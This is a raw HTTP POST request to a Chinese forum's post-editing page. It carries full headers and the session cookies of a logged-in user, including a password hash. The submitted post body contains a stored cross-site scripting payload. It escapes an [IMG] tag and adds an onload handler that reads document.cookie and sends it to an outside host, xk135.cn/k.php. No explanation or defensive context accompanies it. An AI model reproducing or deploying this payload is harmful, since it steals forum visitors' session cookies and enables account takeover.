POST /bbs/xiugai.aspx?abc=xiu&table=0&id=122776 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Referer: http://www.jiaonan.net/bbs/xiugai.aspx?table=0&id=122776&bt=%5b%cc%d6%c2%db%5d%a1%b0%c2%bf%d3%d1%a1%b1%d6%ae%ce%d2%bc%fb
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: www.jiaonan.net
Content-Length: 400
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: shuziren=szr; jiaonan.net=huiyuan=newcn&hypwd=b79a630dfc35d8f28080f72d8b220abd&jst_fs=False; jishuqi=202.96.56.194; hysj=2008-12-12+18%3a02%3a21; hyline=2008-12-12+18%3a02%3a22; ASP.NET_SessionId=ubmstv5542r4im45rhcs1f45; web_sx=2008-12-12 11:31:11; bt=%e5%90%8c%e6%84%8f+%5bIMG%5dhttp%3a%2f%2fimg2.cache.netease.com%2fcnews%2f2; AJSTAT_ok_pages=3; AJSTAT_ok_times=1; yzm=

nr=ding..+%5BIMG%5Dhttp%3A%2F%2Fimg2.cache.netease.com%2Fcnews%2F2008%2F12%2F12%2F20081212094834c4260.jpg%5C%22
onload%3D%5C%22d%3Ddocument.cookie%3Bi%3Ddocument.createElement%28%5C%22img%5C%22%29%3Bi.src%3D%5C%22http%3A%2F%2Fwww.xk135.cn%2Fk.php%3Fc%3D%5C%22%2Bescape%28d%29%2B%5C%22%26t%3D%5C%22%2BMath.random%28%29%3Bdocument.body.append%28i%29%3B%5B%2Fimg%5D&Submit=OK%2C%CC%E1%BD%BB%CC%F9%D7%D3